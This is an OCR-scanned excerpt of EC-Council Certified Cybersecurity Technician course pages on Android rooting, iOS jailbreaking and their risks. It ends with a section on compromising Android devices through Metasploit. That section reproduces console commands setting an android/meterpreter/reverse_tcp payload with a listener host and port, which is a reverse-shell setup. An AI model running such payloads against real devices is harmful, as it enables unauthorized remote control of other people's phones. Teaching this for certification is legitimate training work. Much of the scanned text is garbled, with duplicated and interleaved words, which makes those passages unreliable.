Android and iOS Rooting and Jailbreaking PDF

Document Details

barrejamesteacher

Uploaded by barrejamesteacher

null

EC-Council

Tags

android rooting ios jailbreaking cybersecurity information security

Summary

This document discusses the methods of rooting Android devices and jailbreaking iOS devices, along with the related security risks and the tools required. It provides a technical overview of the procedures involved.

Full Transcript

Certified Cybersecurity Technician Information Security Attacks Exam 212-82 Android Rooting O O P -3 l'l and=0I1D Rooting allows Android users to attain privileged control (known as "root access") within Android's subsystem Rooting process involves exploiting security vulnerabilities in the de...

Certified Cybersecurity Technician Information Security Attacks Exam 212-82 Android Rooting O O P -3 l'l and=0I1D Rooting allows Android users to attain privileged control (known as "root access") within Android's subsystem Rooting process involves exploiting security vulnerabilities in the device firmware and copying the SU binary to a location in the current process's PATH (e.g., /system/xbin/su) and granting it executable permissions with the chmod command Rooting enables all user-installed applications to run privileged commands, such as » Modifying or deleting system files, module, ROMs (stock firmware), and kernels » Removing carrier- or manufacturer- installed applications (bloatware) > Low-level access to the hardware that are typically unavailable to the devices in their default configuration » Wi-Fi and Bluetooth tethering 7 Install applications on an SD card Copyright © by I L All Rights Reserved. Reproductionis Strictly Prohibited 1 Android Rooting The goal of rooting Android is to overcome the restrictions imposed by hardware manufacturers and carriers, thereby resulting in the ability to modify or replace system applications and settings, run apps that require admin privileges, remove and replace a device’s 0S, remove applications pre-installed by its manufacturer or carrier, or perform other operations that are otherwise inaccessible to the typical Android user. Rooting allows Android users to attain privileged control (known as “root access”) within Android’s subsystem. The rooting process involves exploiting security vulnerabilities in the device’s firmware, copying the su binary to a location in the current process’s PATH (e.g., /system/xbin/su), and granting it executable permissions with the chmod command. Rooting enables all the user-installed applications to run privileged commands such as = Modifying or deleting system files, modules, ROMs (stock firmware), and kernels = Removing carrier- or manufacturer-installed applications (bloatware) = Low-level access to hardware that is typically unavailable to devices in their default configuration = |Improved performance = Wi-Fi and Bluetooth tethering * |nstalling applications on SD card = Better user interface and keyboard Rooting also comes with many security risks and other risks to your device, including * Voiding your phone's warranty Module 02 Page 353 Certified Cybersecurity Technician Copyright © by EC-Gouncil All Rights Reserved. Reproduction is Strictly Prohibited. Certified Cybersecurity Technician Information Security Attacks *= Poor performance = Malware infection Malware = “Bricking” the device Exam 212-82 One can use tools such as KingoRoot, TunesGo Root Android Tool, and so on to root Android devices. Module Module02 02 Page 354 Certified Cybersecurity ©© by EG-Gouncil Certified Cybersecurity Technician Technician Copyright Copyright EG-Gouneil All Rights Reserved. Reproduction is Strictly Prohibited. Certified Cybersecurity Technician Information Security Attacks Exam 212-82 Jailbreaking iOS Jailbreaking is defined as the process of installing a * modified set of kernel patches that allows users to 158 run third-party applications not signed by the OS vendor * Jailbreaking provides root access to the operating system and permits downloading of third-party applications, themes, and extensions on iOS devices * Jailbreaking removes sandbox restrictions, which enables malicious apps to access restricted mobile resources and information oK (= App Store 4 Copyright © by EC cil served. Reproduction is Strictly Prohibited. | | Jailbreaking iOS Jailbreaking is defined as the process of installing a modified set of kernel patches that allow users to run third-party applications not signed by the OS vendor. It is the process of bypassing the user limitations set by Apple, such as modifying the OS, attaining admin privileges, and installing unofficially approved apps via “side loading.” You can accomplish jailbreaking by simply modifying the iOS system kernels. One reason for jailbreaking iOS devices such as iPhone, iPad, and iPod Touch is to expand the feature set restricted by Apple and its App Store. Jailbreaking provides root access to the OS and permits downloading of third-party applications, themes, and extensions that are unavailable through the official Apple App Store. Jailbreaking also removes sandbox restrictions, allowing malicious apps to access restricted mobile resources and information. One can use tools such as Cydia, Yuxigon, Sileo, and so on to jailbreak iOS devices. Jailbreaking, including like rooting, comes with = Voiding your phone’s warranty = Poor performance = Malware infection = “Bricking” the device Module 02 Page 355 many security risks and other Hexxa Plus, ApricotiOS, risks to your device, Certified Cybersecurity Technician Copyright © by EC-Gouncil All Rights Reserved. Reproduction is Strictly Prohibited. merdned Lyoersecurity Technici an Attacks Information Security Attacks verunea Lyoersecurity Informat ion SecurityTechnician Exam 212-82 Exam 212-82 Hacking anan Hacking Android Device Device Android Using Metasploit Metasploit - Using Terminal Terminal Help Help Attackers use various tools such Attackers use various tools such asas Metasploit to create binary payloads Metasploit to create binary payloads, , which are sent the target target Android Android which are sent toto the device to gain control overit device to gain control over it Hacking an Android Device Using Metasploit Metasploit Hacking an Android Device Using Copyright Copyrig © by EC-Council. All Rights Reserved. Reproduction Is Strictly Prohibited ht © by EC-Council. Al Rights Reserve d. Reproduction is Strictly Prohibited, Attackers use various tools such as Metasploit to create binary payloads, which are sent to the target Android device to gain control over it. The Metasploit Framework is a Ruby-based, modular penetration testing platform that enables you to write, test, and execute exploit code. * Metasploit = Metasploit Source: https.//www.metasploit. com Source: https://www.metasploit.com Metasploit Framework contains a vulnerabilities, enumerate networ ks, vulnerabilities, enumerate networks, is a Metasploit attack payload is a Metasploit attack payload that that explore target machines and exe cut e explore target machines and execute Module 02 Page 356 Module 02 Page 356 suite of tools that you can use to test security exe execute attacks, and eva evade detection. Meterpreter cute atta cks, and de det ection. Met erpreter pro vides anan int provides interactive shell that can be used to eractive shel l that can be used to cod code. e. Copyright © by EG-Gouncil CertiCertified fied CybeCybersecurity rsecurity TechTechnician nician Copyright is© Strictly by EC-CPrabikitad ouncil Reproduction All Rights All Right s ReseReserved. rved. Reproduction ic Stric Certified Cybersecurity Technician Information Security Attacks Exam 212-82 N File Parrot Terminal Edit View Search Terminal Help msf5 exploit( ) >|set payload android/meterpreter/reverse payload => android/meterpreter/reverse tcp msf5 exploit( LHOST => 10.10.10.13 msfS exploit( Module Name Payload options be options Current Setting ) >Ishow LHOST 10.10.10.13 options Required Description (android/meterpreter/reverse tcp): Setting LHOST 10.10.10.13 specified) LPORT 4444 Exploit >|set (exploit/multi/handler): Current Name ) tcp Required Description The listen address The listen port (an interface may target: Id Name 0 Wildcard Target Figure 2.69: Screenshot of Metasploit Module 02 Page 357 Certified Cybersecurity Technician Copyright © by EC-Gouncil All Rights Reserved. Reproduction is Strictly Prohibited.

Use Quizgecko on...
Browser
Browser